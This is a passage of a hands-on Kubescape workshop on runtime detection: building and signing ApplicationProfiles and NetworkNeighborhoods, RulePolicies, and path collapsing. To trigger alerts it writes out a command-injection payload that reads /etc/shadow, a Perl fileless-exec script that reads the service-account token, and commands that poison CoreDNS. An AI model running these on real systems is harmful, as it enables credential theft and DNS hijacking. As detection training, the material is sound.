        "apache2␟52441": {
          "pid": 52441,
          "cmdline": "apache2 -DFOREGROUND",
          "comm": "apache2",
          "ppid": 52414,
          "pcomm": "apache2",
          "uid": 33,
          "gid": 33,
          "startTime": "0001-01-01T00:00:00Z",
          "cwd": "/var/www/html",
          "path": "/usr/sbin/apache2",
          "childrenMap": {
            "sh␟54441": {
              "pid": 54441,
              "cmdline": "/bin/sh -c ping -c 4 1.1.1.1;cat /etc/shadow",
              "comm": "sh",
              "ppid": 52441,
              "pcomm": "apache2",
              "uid": 33,
              "gid": 33,
              "startTime": "0001-01-01T00:00:00Z",
              "path": "/bin/dash",
              "childrenMap": {
                "cat␟54449": {
                  "pid": 54449,
                  "cmdline": "/bin/cat /etc/shadow",
                  "comm": "cat",
                  "ppid": 54441,
                  "pcomm": "sh",
                  "uid": 33,
                  "gid": 33,
                  "startTime": "0001-01-01T00:00:00Z",
                  "path": "/bin/cat"
                }
              }
            }
          }
        }
      }
    }
  }
}

Cleanup β€” remove the webapp
kubectl delete namespace webapp

The Loremaster finishes his work. The execve event now carries its full lineage and Kubernetes identity. Copies are dispatched: one to the Archive for recording, another to the Inquisitor for judgment.

Room 6 -- The Great Archive


Massive filing cabinets stretch from floor to ceiling, one drawer for each container. A meticulous librarian sorts incoming events into labeled drawers. "If I have seen it before," she says, "it is normal. If I have not --- that is for the Inquisitor to decide."

The ApplicationProfile -- the Tome of Behavior

The Profile Manager records every exec, endpoint, open, syscall, and capability observed by the Inspector Gadget-tracer during the learning period into an ApplicationProfile CRD.

#save this as bob.yaml
apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1
kind: ApplicationProfile
metadata:
  name: bob
spec:
  architectures:
  - amd64
  containers:
  - name: redis
    capabilities: null
    endpoints: null
    execs: null
    opens: null
    syscalls: null
    rulePolicies: {}

The recording supports:

  β€’ Deduplication: redis-cli can be exec'd 1000 times; only one entry is stored.
  β€’ Flag merging: if /etc/resolv.conf is opened first with O_RDONLY and later with O_WRONLY, the flags merge to [O_RDONLY, O_WRONLY].
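Both behaviors fall out of keying opens by path and treating flags as a set. A minimal sketch (hypothetical helper names, not the ProfileManager's actual API):

```go
package main

import (
	"fmt"
	"sort"
)

// mergeOpen records an open event, deduplicating by path and merging
// flag sets -- the behavior described in the bullets above.
func mergeOpen(opens map[string]map[string]bool, path string, flags ...string) {
	if opens[path] == nil {
		opens[path] = map[string]bool{}
	}
	for _, f := range flags {
		opens[path][f] = true
	}
}

// flagsOf returns the merged, sorted flag set recorded for a path.
func flagsOf(opens map[string]map[string]bool, path string) []string {
	var out []string
	for f := range opens[path] {
		out = append(out, f)
	}
	sort.Strings(out)
	return out
}

func main() {
	opens := map[string]map[string]bool{}
	mergeOpen(opens, "/etc/resolv.conf", "O_RDONLY")
	mergeOpen(opens, "/etc/resolv.conf", "O_WRONLY") // second open: flags merge
	mergeOpen(opens, "/etc/resolv.conf", "O_RDONLY") // duplicate: no new entry
	fmt.Println(flagsOf(opens, "/etc/resolv.conf"))  // [O_RDONLY O_WRONLY]
}
```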

Out of the box, these profiles can be VERY long and overly specific. Let's look at some tricks to make them more robust.

Quest: Building a Bill of Behavior (APs, NNs, Signatures and RulePolicies)


1) Profile Dependency and RulePolicies

Rules differ in how strongly they depend on an ApplicationProfile: some require one, some use one if available, and some need none at all.

By default, R1005 (Fileless execution detected) does NOT depend on an ApplicationProfile. It's a signature rule (a predefined Indicator of Compromise), so its profile dependency is set to 2 (not required).

Let's walk through how you'd change that: we will now allowlist R1005 via a RulePolicy in the profile. Four things are needed:

A) Let's start with an empty ApplicationProfile and build a bill of behavior step by step

Save the above YAML as bob.yaml, apply it, and attach it to the redis container by adding the label kubescape.io/user-defined-profile: bob to the redis pod:

kubectl apply -f bob.yaml -n redis
kubectl patch deployment redis -n redis --type merge -p '{"spec":{"template":{"metadata":{"labels":{"kubescape.io/user-defined-profile":"bob"}}}}}'

B) enable supportPolicy on R1005 in the rules CRD

kubectl edit rules default-rules -n kubescape

Find the R1005 entry and change supportPolicy: false to supportPolicy: true:

- name: "Fileless execution detected"
  id: "R1005"
  ...
  supportPolicy: true

C) add a rulePolicies stanza to the AP container spec

kubectl edit applicationprofiles.spdx.softwarecomposition.kubescape.io -n redis bob

  rulePolicies:
    R1005:
      processAllowed:
      - "3"

Or to allowlist the entire container for R1005 (any fileless exec is okay):

  rulePolicies:
    R1005:
      containerAllowed: true
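The policy lookup itself is a small check: either the whole container is allowlisted, or the offending process name must appear in processAllowed. A sketch with assumed struct names mirroring the stanza above:

```go
package main

import "fmt"

// RulePolicy mirrors the rulePolicies stanza shown above: either the
// whole container is allowlisted, or only specific process names are.
type RulePolicy struct {
	ContainerAllowed bool
	ProcessAllowed   []string
}

// allowedByPolicy sketches how a policy suppresses an alert for a given
// process name (e.g. "3" for an exec via /proc/self/fd/3).
func allowedByPolicy(p RulePolicy, process string) bool {
	if p.ContainerAllowed {
		return true
	}
	for _, name := range p.ProcessAllowed {
		if name == process {
			return true
		}
	}
	return false
}

func main() {
	p := RulePolicy{ProcessAllowed: []string{"3"}}
	fmt.Println(allowedByPolicy(p, "3"))    // true:  R1005 suppressed
	fmt.Println(allowedByPolicy(p, "perl")) // false: R1005 fires
}
```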

D) Make it active:

kubectl rollout restart deployment redis -n redis

Then repeat our fileless exec test:

REDIS_POD=$(kubectl -n redis get pod -l app.kubernetes.io/name=redis \
  -o jsonpath='{.items[0].metadata.name}')
kubectl -n redis exec "$REDIS_POD" -- perl -e '
use strict; use warnings;
my $name = "pwned";
my $fd = syscall(279, $name, 0);
if ($fd < 0) { $fd = syscall(319, $name, 0); }
die "memfd_create failed\n" if $fd < 0;
open(my $src, "<:raw", "/bin/cat") or die;
open(my $dst, ">&=", $fd) or die;
binmode $dst; my $buf;
while (read($src, $buf, 8192)) { print $dst $buf; }
close $src;
exec {"/proc/self/fd/$fd"} "cat",
  "/var/run/secrets/kubernetes.io/serviceaccount/token";
'
kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=500  | jq '.message'

Take the label on and off and repeat the attack, and watch the message "Fileless execution detected: exec call "3" is from a malicious source" appear and disappear. Given that this is a completely empty profile, you'll also see alerts for everything else that is happening -- you can use this as a kind of strace for debugging.

Side Quest: Inspect the ApplicationProfile

PROFILE=$(kubectl -n redis get applicationprofile -o jsonpath='{.items[0].metadata.name}')
kubectl -n redis get applicationprofile "$PROFILE" -o yaml | head -80

Check the execs section --- there is redis-cli but NOT perl or /proc/self/fd/3. That gap is what makes R0001 fire.

Check the syscalls section --- you should see normal Redis syscalls but NOT memfd_create. That gap triggers R0003.

Where does the profile live in the cluster?

The ApplicationProfile is a CRD stored in etcd via the Kubernetes API. It lives in the same namespace as the workload:

kubectl api-resources | grep applicationprofile
kubectl -n redis get applicationprofile

Last but not least, we reapply the original profile to redis and restart one more time:

kubectl patch deployment redis -n redis --type merge -p '{"spec":{"template":{"metadata":{"labels":{"kubescape.io/user-defined-profile":"redis"}}}}}'
kubectl rollout restart deployment redis -n redis

Quest: The blessing of the Bill

No demogods required

The Archivist can also accept signatures. At the time of writing, we sign both ApplicationProfiles and NetworkNeighborhoods. We might also sign RulePolicies and CollapsConfigs in the future.

labels:
  kubescape.io/user-defined-profile: my-ap-name     # ApplicationProfile
  kubescape.io/user-defined-network: my-nn-name      # NetworkNeighborhood

When you use user-defined-profile, the learning period for the profile is skipped (the network case is more involved).

But how do you trust any scroll? Anyone could forge one.

The answer: cryptographic signing. A signed profile carries ECDSA annotations that the node-agent verifies before loading. A tampered profile fails verification and is rejected.

   β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”   sign   β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
   β”‚  Unsigned Profile  β”‚  ──────> β”‚  Signed Profile                      β”‚
   β”‚  (AP or NN YAML)   β”‚          β”‚  + signature.kubescape.io/signature  β”‚
   β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜          β”‚  + signature.kubescape.io/certificateβ”‚
                                   β”‚  + signature.kubescape.io/issuer     β”‚
                                   β”‚  + signature.kubescape.io/identity   β”‚
                                   β”‚  + signature.kubescape.io/timestamp  β”‚
                                   β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Signing an ApplicationProfile

In this quest you will:

  1. Build the signing tool and generate a key pair
  2. Sign an ApplicationProfile and a NetworkNeighborhood for the webapp
  3. Deploy the signed profiles, then the webapp
  4. Reach out to fusioncore.ai (legitimate) --- no alert
  5. Simulate a DNS MITM attack --- R0011 fires

We reuse the webapp from Room 5, with one modification: the AP now allows sh and ping (for the ping.php feature), and we add a NetworkNeighborhood that pins fusioncore.ai to its real IP 162.0.217.171.

Step 1 --- Generate a signing key

The sign-object CLI is published as a container image:

sign="ghcr.io/k8sstormcenter/sign-object@sha256:7b088be3a4408b4c0f259f1c2ee5d4bb1f9659e2716b217917bcf975063b7453"
docker pull $sign

Generate an ECDSA P-256 key pair:

docker run --rm -v $(pwd):/work $sign generate-keypair --output /work/bob.key

This produces bob.key (private) and bob.key.pub (public). The private key signs profiles; the node-agent uses the embedded certificate to verify.

Step 2 --- Save the unsigned profiles

webapp-ap.yaml --- the unsigned ApplicationProfile
cat <<'EOF' > webapp-ap.yaml
apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1
kind: ApplicationProfile
metadata:
  name: webapp-ap
  namespace: webapp
spec:
  architectures:
  - amd64
  containers:
  - capabilities:
    - CAP_DAC_OVERRIDE
    - CAP_SETGID
    - CAP_SETUID
    endpoints:
    - direction: inbound
      endpoint: :8080/ping.php
      headers:
        Host:
        - 127.0.0.1:8080
      internal: false
      methods:
      - GET
    execs:
    - args:
      - /bin/sh
      - -c
      - ping -c 4 fusioncore.ai
      path: /bin/sh
    - args:
      - /usr/bin/dirname
      - /var/lock/apache2
      path: /usr/bin/dirname
    - args:
      - /usr/local/bin/docker-php-entrypoint
      - apache2-foreground
      path: /usr/local/bin/docker-php-entrypoint
    - args:
      - /bin/mkdir
      - -p
      - /var/log/apache2
      path: /bin/mkdir
    - args:
      - /usr/bin/dirname
      - /var/run/apache2
      path: /usr/bin/dirname
    - args:
      - /bin/mkdir
      - -p
      - /var/run/apache2
      path: /bin/mkdir
    - args:
      - /bin/ping
      - -c
      - "4"
      - fusioncore.ai
      path: /bin/ping
    - args:
      - /bin/mkdir
      - -p
      - /var/lock/apache2
      path: /bin/mkdir
    - args:
      - /usr/sbin/apache2
      - -DFOREGROUND
      path: /usr/sbin/apache2
    - args:
      - /usr/local/bin/apache2-foreground
      path: /usr/local/bin/apache2-foreground
    - args:
      - /bin/rm
      - -f
      - /var/run/apache2/apache2.pid
      path: /bin/rm
    - args:
      - /usr/bin/dirname
      - /var/log/apache2
      path: /usr/bin/dirname
    name: mywebapp-app
    opens:
    - path: /*
      flags: [O_RDONLY, O_WRONLY, O_RDWR, O_CREAT, O_APPEND, O_CLOEXEC, O_DIRECTORY, O_EXCL, O_NONBLOCK]
    syscalls:
    - accept4
    - access
    - arch_prctl
    - bind
    - brk
    - capget
    - capset
    - chdir
    - chmod
    - clone
    - close
    - close_range
    - connect
    - dup2
    - dup3
    - epoll_create1
    - epoll_ctl
    - epoll_pwait
    - execve
    - exit
    - exit_group
    - faccessat2
    - fcntl
    - fstat
    - fstatfs
    - futex
    - getcwd
    - getdents64
    - getegid
    - geteuid
    - getgid
    - getpgrp
    - getpid
    - getppid
    - getrandom
    - getsockname
    - getsockopt
    - gettid
    - getuid
    - ioctl
    - listen
    - lseek
    - lstat
    - mkdir
    - mmap
    - mprotect
    - munmap
    - nanosleep
    - newfstatat
    - openat
    - openat2
    - pipe
    - pipe2
    - poll
    - prctl
    - prlimit64
    - read
    - recvfrom
    - recvmsg
    - rename
    - rt_sigaction
    - rt_sigprocmask
    - rt_sigreturn
    - sched_yield
    - select
    - sendmmsg
    - sendto
    - set_robust_list
    - set_tid_address
    - setgid
    - setgroups
    - setitimer
    - setsockopt
    - setuid
    - shutdown
    - sigaltstack
    - socket
    - stat
    - statfs
    - statx
    - sysinfo
    - tgkill
    - times
    - tkill
    - umask
    - uname
    - unknown
    - unlinkat
    - vfork
    - wait4
    - write
    - writev
    rulePolicies: {}
    imageID: ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b
    imageTag: ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b
EOF
webapp-nn.yaml --- the unsigned NetworkNeighborhood
cat <<'EOF' > webapp-nn.yaml
apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1
kind: NetworkNeighborhood
metadata:
  name: webapp-nn
  namespace: webapp
  annotations:
    kubescape.io/managed-by: User
    kubescape.io/status: completed
    kubescape.io/completion: complete
  labels:
    kubescape.io/workload-api-group: apps
    kubescape.io/workload-api-version: v1
    kubescape.io/workload-kind: Deployment
    kubescape.io/workload-name: webapp-mywebapp
    kubescape.io/workload-namespace: webapp
spec:
  matchLabels:
    app.kubernetes.io/name: mywebapp
  containers:
  - name: mywebapp-app
    ingress: []
    egress:
    - dns: fusioncore.ai.
      dnsNames:
      - fusioncore.ai.
      identifier: fusioncore-egress
      ipAddress: "162.0.217.171"
      ports:
      - name: TCP-80
        port: 80
        protocol: TCP
      type: external
    - dns: 171.217.0.162.in-addr.arpa.
      dnsNames:
      - 171.217.0.162.in-addr.arpa.
      identifier: fusioncore-ptr
      ports:
      - name: UDP-53
        port: 53
        protocol: UDP
      type: external
EOF

Notice the key difference from Room 5's AP: we added /bin/sh and /bin/ping to the execs list. The ping.php feature uses shell_exec("ping ..."), so sh and ping are legitimate. Without them, R0001 would fire every time a user pings something --- that's a false positive, not a real attack.

The NetworkNeighborhood declares that fusioncore.ai resolves to 162.0.217.171 on TCP/80. Any connection to fusioncore.ai that lands on a different IP is a Man-in-the-Middle.
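The detection logic this enables is a pin check: the observed destination IP for a known DNS name must match the declared one. A minimal sketch (hypothetical function and table, not the rule engine's actual code; the real NN also matches ports and protocol):

```go
package main

import "fmt"

// pinned maps a DNS name to the IP the NetworkNeighborhood declares for
// it (the real NN entry also carries ports and protocol).
var pinned = map[string]string{"fusioncore.ai.": "162.0.217.171"}

// looksLikeMITM sketches the R0011-style check: a connection to a pinned
// DNS name that lands on an unexpected IP is suspicious.
func looksLikeMITM(dnsName, observedIP string) bool {
	want, ok := pinned[dnsName]
	return ok && want != observedIP
}

func main() {
	fmt.Println(looksLikeMITM("fusioncore.ai.", "162.0.217.171")) // false: legitimate
	fmt.Println(looksLikeMITM("fusioncore.ai.", "6.6.6.6"))       // true: MITM territory
}
```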

Step 3 --- Sign both profiles

docker run --rm -v $(pwd):/work $sign sign --key /work/bob.key --file /work/webapp-ap.yaml --output /work/signed-webapp-ap.yaml
docker run --rm -v $(pwd):/work $sign sign --key /work/bob.key --file /work/webapp-nn.yaml --output /work/signed-webapp-nn.yaml
[info] βœ“ Profile signed successfully
  Issuer: local
Successfully signed object. namespace: webapp; name: webapp-ap; identity: local-key; issuer: local
  Identity: local-key
  Timestamp: 1773511625
βœ“ Signed profile written to: /work/signed-webapp-ap.yaml

Verify the signatures:

docker run --rm -v $(pwd):/work $sign verify --file /work/signed-webapp-ap.yaml --strict=false
docker run --rm -v $(pwd):/work $sign verify --file /work/signed-webapp-nn.yaml --strict=false

Inspect what was added:

docker run --rm -v $(pwd):/work $sign extract-signature --file /work/signed-webapp-ap.yaml

You'll see the signature.kubescape.io/* annotations --- the ECDSA signature, self-signed certificate, issuer (local), identity (local-key), and timestamp.

What happens under the hood when the node-agent loads a signed profile?
                   β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
   kubectl apply   β”‚  Signed AP/NN in storage   β”‚
   ───────────────>β”‚  (etcd via API server)     β”‚
                   β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                                 β”‚  periodic fetch
                                 β–Ό
                   β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
                   β”‚  Cache: verify signature   β”‚
                   β”‚                            β”‚
                   β”‚  1. Extract certificate    β”‚
                   β”‚  2. Compute content hash   β”‚
                   β”‚  3. Verify ECDSA signature β”‚
                   β”‚                            β”‚
                   β”‚  βœ“ Valid β†’ cache profile   β”‚
                   β”‚  βœ— Invalid β†’ reject, log   β”‚ (currently implementing: an Alert and Fallback to last verified AP)
                   β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Step 4 --- Deploy to the cluster

Clean up from Room 5 (if the webapp namespace still exists), then deploy:

kubectl delete namespace webapp --ignore-not-found --wait=false
kubectl create namespace webapp

Apply signed profiles first (they must exist before the pod starts):

kubectl apply -f signed-webapp-ap.yaml
kubectl apply -f signed-webapp-nn.yaml

Now deploy the webapp with both profile labels:

kubectl apply -f - <<'EOF'
apiVersion: apps/v1
kind: Deployment
metadata:
  name: webapp-mywebapp
  namespace: webapp
  labels:
    app.kubernetes.io/name: mywebapp
    app.kubernetes.io/instance: webapp
spec:
  replicas: 1
  selector:
    matchLabels:
      app.kubernetes.io/name: mywebapp
      app.kubernetes.io/instance: webapp
  template:
    metadata:
      labels:
        app.kubernetes.io/name: mywebapp
        app.kubernetes.io/instance: webapp
        kubescape.io/user-defined-profile: webapp-ap
        kubescape.io/user-defined-network: webapp-nn
    spec:
      serviceAccountName: default
      containers:
        - name: mywebapp-app
          image: "ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b"
          imagePullPolicy: Always
          ports:
            - name: http
              containerPort: 80
              protocol: TCP
          volumeMounts:
            - mountPath: /host/var/log
              name: nodelog
      volumes:
        - name: nodelog
          hostPath:
            path: /var/log
---
apiVersion: v1
kind: Service
metadata:
  name: webapp-mywebapp
  namespace: webapp
spec:
  type: ClusterIP
  ports:
    - port: 8080
      targetPort: 80
      protocol: TCP
      name: http
  selector:
    app.kubernetes.io/name: mywebapp
    app.kubernetes.io/instance: webapp
EOF

If you now check the node-agent logs:

{"level":"info","ts":"2026-03-14T18:16:26Z","msg":"container has a user defined profile","profile":"webapp-ap","container":"mywebapp-app","workload":"webapp-mywebapp-6fb48bfbcd-v6r22"}
{"level":"info","ts":"2026-03-14T18:16:26Z","msg":"container has a user defined network neighborhood","network":"webapp-nn","container":"mywebapp-app","workload":"webapp-mywebapp-6fb48bfbcd-v6r22"}

If you signed with a self-signed certificate, you will see this warning instead:

"Signed ApplicationProfile 'webapp-ap' in namespace 'webapp' has been tampered with: signature verification failed: failed to verify certificate chain: x509: certificate signed by unknown authority"

Step 5 --- Legitimate traffic (no alert)

Port-forward the webapp and ping fusioncore.ai:

sudo kill -9 $(sudo lsof -t -i :8080) 2>/dev/null || true
kubectl --namespace webapp port-forward $(kubectl get pods --namespace webapp -l "app.kubernetes.io/name=mywebapp,app.kubernetes.io/instance=webapp" -o jsonpath="{.items[0].metadata.name}") 8080:80 &

In a second terminal:

curl "127.0.0.1:8080/ping.php?ip=fusioncore.ai"
Ping results for fusioncore.ai:
PING fusioncore.ai (162.0.217.171) 56(84) bytes of data.
64 bytes from server324-1.web-hosting.com (162.0.217.171): icmp_seq=1 ttl=46 time=28.2 ms
64 bytes from server324-1.web-hosting.com (162.0.217.171): icmp_seq=2 ttl=46 time=28.2 ms
64 bytes from server324-1.web-hosting.com (162.0.217.171): icmp_seq=3 ttl=46 time=28.3 ms
64 bytes from server324-1.web-hosting.com (162.0.217.171): icmp_seq=4 ttl=46 time=28.3 ms

The webapp resolves fusioncore.ai β†’ 162.0.217.171 and pings it. The NN allows this domain and IP. Check the logs:

kubectl logs -n kubescape -l app=node-agent -c node-agent -f

No R0005 (DNS is allowed), no R0011 (IP is in the NN). The signed profiles are working.

Step 6 --- MITM attack: poison the cluster DNS

Now simulate a real DNS man-in-the-middle attack by poisoning CoreDNS so that fusioncore.ai resolves to a different IP.

Back up the original CoreDNS config, then inject a spoofed template record that makes fusioncore.ai resolve to 8.8.4.4:

kubectl get cm coredns -n kube-system -o jsonpath='{.data.Corefile}' > ~/coredns-original.conf
sed '/forward \./i\    template IN A fusioncore.ai {\n        answer "fusioncore.ai. 60 IN A 8.8.4.4"\n        fallthrough\n    }' \
  ~/coredns-original.conf > ~/coredns-poisoned.conf
kubectl get cm coredns -n kube-system -o json | \
  jq --rawfile cf ~/coredns-poisoned.conf '.data.Corefile = $cf' | \
  kubectl apply -f -
kubectl rollout restart deploy/coredns -n kube-system
kubectl -n kube-system rollout status deploy/coredns

Now ping fusioncore.ai again:

curl "127.0.0.1:8080/ping.php?ip=fusioncore.ai"
Ping results for fusioncore.ai 
PING fusioncore.ai (8.8.4.4)

Step 7 --- Read the alert

kubectl logs -n kubescape -l app=node-agent -c node-agent | jq
{"BaseRuntimeMetadata":{"alertName":"DNS Anomalies in container","arguments":{"addresses":null,"apChecksum":"a560862b9716c8b94e546230a7b9712f981250d4cc7526c63200b835da658737","domain":"4.4.8.8.in-addr.arpa.","message":"Unexpected domain communication: 4.4.8.8.in-addr.arpa. from: mywebapp-app","port":58011,"protocol":"UDP"},"infectedPID":16901,"severity":1,"size":"4.1 kB","timestamp":"2026-03-14T19:30:37.102756958Z","trace":{},"uniqueID":"ac9a549d90a657259b16cd02a259598d","profileMetadata":{"status":"completed","completion":"complete","name":"webapp-nn","failOnProfile":true,"type":1},"identifiers":{"process":{"name":"ping"},"dns":{"domain":"4.4.8.8.in-addr.arpa."},"network":{"protocol":"UDP"}},"agentVersion":"test-4f42ff4"},"CloudMetadata":null,"RuleID":"R0005","RuntimeK8sDetails":{"clusterName":"default","containerName":"mywebapp-app","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b","imageDigest":"sha256:c622cf306b94e8a6e7cfd718f048015e033614170f19228d8beee23a0ccc57bb","namespace":"webapp","containerID":"9f099baef8a9c8037e64e5e19ef23b32e273b5f4ca8968c5aa6095c2079a5906","podName":"webapp-mywebapp-6fb48bfbcd-74hp8","podNamespace":"webapp","podUID":"9f880bae-3059-40c6-8c11-617ece7332ed","podLabels":{"app.kubernetes.io/instance":"webapp","app.kubernetes.io/name":"mywebapp","kubescape.io/user-defined-network":"webapp-nn","kubescape.io/user-defined-profile":"webapp-ap","pod-template-hash":"6fb48bfbcd"},"workloadName":"webapp-mywebapp","workloadNamespace":"webapp","workloadKind":"Deployment","workloadUID":"50709265-9946-4ec8-9f86-556e459883c6"},"RuntimeProcessDetails":{"processTree":{"pid":12748,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":12304,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","childrenMap":{"apache2␟12784":{"pid":12784,"cmdline":"apache2 
-DFOREGROUND","comm":"apache2","ppid":12748,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","childrenMap":{"sh␟16900":{"pid":16900,"cmdline":"/bin/sh -c ping -c 4 fusioncore.ai","comm":"sh","ppid":12784,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","path":"/bin/dash","childrenMap":{"ping␟16901":{"pid":16901,"cmdline":"/bin/ping -c 4 fusioncore.ai","comm":"ping","ppid":16900,"pcomm":"sh","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","path":"/bin/ping"}}}}}}},"containerID":"9f099baef8a9c8037e64e5e19ef23b32e273b5f4ca8968c5aa6095c2079a5906"},"level":"error","message":"Unexpected domain communication: 4.4.8.8.in-addr.arpa. from: mywebapp-app","msg":"DNS Anomalies in container","processtree_depth":"4","time":"2026-03-14T19:30:37Z"}

You will see the alert four times, because ping -c 4 performs a reverse-DNS lookup for each of its four replies.

Cleanup --- restore CoreDNS
kubectl get cm coredns -n kube-system -o json | \
  jq --rawfile cf ~/coredns-original.conf '.data.Corefile = $cf' | \
  kubectl apply -f -
kubectl rollout restart deploy/coredns -n kube-system
Cleanup --- remove the webapp
kubectl delete namespace webapp

The Archivist has recorded everything "normal" about this webapp. The signed scrolls are tamper-proof --- any modification to the spec invalidates the signature. The NetworkNeighborhood pins domains to IPs, catching DNS spoofing that would fool any application. Now the profile passes to the Vault for its final transformation before the Inquisitor uses it.

Room 7 -- The Vault of Collapsing Paths


The Vault Keeper examines every path in the profile and asks: "Shall I remember each leaf individually, or fold them into a wildcard branch?" Her decision depends on magical thresholds inscribed on the CollapseConfig scroll.

  node-agent (tracer Gadgets)              storage singleton
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”             β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚  Incoming Events        β”‚   PreSave   β”‚  Trie-based collapse         β”‚
  β”‚  opens:                 β”‚ ──────────> β”‚                              β”‚
  β”‚   /proc/1/stat          β”‚             β”‚  /proc/                      β”‚
  β”‚   /proc/2/stat          β”‚             β”‚    β”œβ”€β”€ β‹―/                    β”‚
  β”‚   /proc/3/stat          β”‚             β”‚    β”‚   └── stat  (collapsed) β”‚
  β”‚   /proc/4/stat          β”‚             β”‚    └── self/                 β”‚
  β”‚   /proc/self/status     β”‚             β”‚        └── status  (kept)    β”‚
  β”‚   /etc/resolv.conf      β”‚             β”‚  /etc/                       β”‚
  β”‚   /etc/redis/redis.conf β”‚             β”‚    β”œβ”€β”€ resolv.conf           β”‚
  β”‚   ...                   β”‚             β”‚    └── redis/                β”‚
  β”‚                         β”‚             β”‚        └── redis.conf        β”‚
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜             β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                                                β‹― = matches ONE segment
                                                * = matches ZERO or MORE

The storage component (separate repo: github.com/kubescape/storage) runs a PreSave hook when the profile is persisted. It builds a trie from all paths and collapses directories that exceed their threshold.
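
The collapse idea can be sketched in a few dozen lines of Go. This is a toy, assuming a single dynamic segment and a simple "more than threshold distinct values" rule; the real PreSave trie in the storage repo also handles nested directories, endpoint thresholds, and merging adjacent β‹― into *.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
)

// collapse is a toy version of the trie collapse: if more than
// `threshold` paths differ only in one segment, that segment is
// replaced by the dynamic marker β‹―.
func collapse(paths []string, threshold int) []string {
	// For each path, replace each segment in turn with β‹― and count
	// how many distinct values that segment takes for the same pattern.
	groups := map[string]map[string]bool{} // pattern -> distinct segment values
	for _, p := range paths {
		segs := strings.Split(p, "/")
		for i, s := range segs {
			segs[i] = "β‹―"
			pat := strings.Join(segs, "/")
			if groups[pat] == nil {
				groups[pat] = map[string]bool{}
			}
			groups[pat][s] = true
			segs[i] = s
		}
	}
	keep := map[string]bool{}
	for _, p := range paths {
		keep[p] = true
	}
	for pat, vals := range groups {
		if len(vals) > threshold {
			// Fold all matching concrete paths into the pattern.
			for _, p := range paths {
				if matchesPattern(pat, p) {
					delete(keep, p)
				}
			}
			keep[pat] = true
		}
	}
	out := make([]string, 0, len(keep))
	for p := range keep {
		out = append(out, p)
	}
	sort.Strings(out)
	return out
}

// matchesPattern treats β‹― as "exactly one segment".
func matchesPattern(pat, p string) bool {
	ps, cs := strings.Split(pat, "/"), strings.Split(p, "/")
	if len(ps) != len(cs) {
		return false
	}
	for i := range ps {
		if ps[i] != "β‹―" && ps[i] != cs[i] {
			return false
		}
	}
	return true
}

func main() {
	paths := []string{
		"/proc/1/stat", "/proc/2/stat", "/proc/3/stat", "/proc/4/stat",
		"/proc/self/status", "/etc/resolv.conf",
	}
	for _, p := range collapse(paths, 3) {
		fmt.Println(p)
	}
}
```

With threshold 3, the four /proc/<pid>/stat paths fold into /proc/β‹―/stat, while /proc/self/status and /etc/resolv.conf survive unchanged, matching the diagram above.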

The Two Special Symbols

| Symbol | Name | Matches | Created when |
|--------|------|---------|--------------|
| β‹― (U+22EF) | Dynamic | Exactly one segment | Children exceed threshold |
| * | Wildcard | Zero or more segments | Threshold = 1, or adjacent β‹― merge |

Validation and prerequisites

Prerequisites: The storage image must include the CollapseConfiguration API (branch feature/collapse-config-crd in the storage repo). Without it, kubectl get collapseconfigurations returns "resource type not found" and storage uses built-in defaults.

Validation rules:

  • openDynamicThreshold must be >= 1
  • endpointDynamicThreshold must be >= 1
  • Each entry: prefix must not be empty, threshold must be >= 1
